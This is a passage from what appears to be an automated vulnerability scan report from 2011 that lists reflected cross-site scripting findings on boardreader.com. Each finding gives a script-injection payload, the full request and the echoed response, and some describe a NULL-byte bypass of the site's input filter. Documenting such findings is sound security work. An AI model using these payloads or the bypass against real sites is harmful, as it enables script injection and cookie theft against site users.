Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1"> ...[SNIP]...
1.94. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f15'-alert(1)-'e30e737b55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ratedesi.com?d8f15'-alert(1)-'e30e737b55a=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:54:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:54:08 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ratedesi.com&d8f15'-alert(1)-'e30e737b55a=1&p=30&d=1288940048&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c1b"><script>alert(1)</script>c6dc46feb64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:15 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:17 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1"> ...[SNIP]...
1.96. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fd25'-alert(1)-'46ee574fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/sherdog.net?3fd25'-alert(1)-'46ee574fc5=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:27 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:29 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=sherdog.net&3fd25'-alert(1)-'46ee574fc5=1&p=30&d=1288940009&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b68"><script>alert(1)</script>31e4bcbef97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:46 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1"> ...[SNIP]...
1.98. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be3e'-alert(1)-'8c796450d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ufc.com?2be3e'-alert(1)-'8c796450d60=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:13 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:15 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ufc.com&2be3e'-alert(1)-'8c796450d60=1&p=30&d=1288939995&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f166'-alert(1)-'182d880e185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/websitetoolbox.com?3f166'-alert(1)-'182d880e185=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:17 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=websitetoolbox.com&3f166'-alert(1)-'182d880e185=1&p=30&d=1288940011&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.100. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2db"><script>alert(1)</script>3a4a3e5c070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:32 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:34 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1"> ...[SNIP]...
1.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c581"><script>alert(1)</script>99d3eb93754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:21 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:30 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1"> ...[SNIP]...
1.102. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bbef'-alert(1)-'5ee0da9ec64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/worldmastiffforum.com?4bbef'-alert(1)-'5ee0da9ec64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=worldmastiffforum.com&4bbef'-alert(1)-'5ee0da9ec64=1&p=30&d=1288939970&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
The value of the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004177f"><script>alert(1)</script>0da953a680a was submitted in the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter. This input was echoed as 4177f"><script>alert(1)</script>0da953a680a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext"> ...[SNIP]...
The value of the extended_search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 484f3"><script>alert(1)</script>8c7809fc22a was submitted in the extended_search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... lick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext"> ...[SNIP]...
The value of the ltype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b85f1"><script>alert(1)</script>8330a287d66 was submitted in the ltype parameter. This input was echoed as b85f1"><script>alert(1)</script>8330a287d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... "./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66"> ...[SNIP]...
1.106. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87160"><script>alert(1)</script>04f67b98015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:31:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... f="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1"> ...[SNIP]...
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bb6"><script>alert(1)</script>60f59291b18 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gife6bb6"><script>alert(1)</script>60f59291b18&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
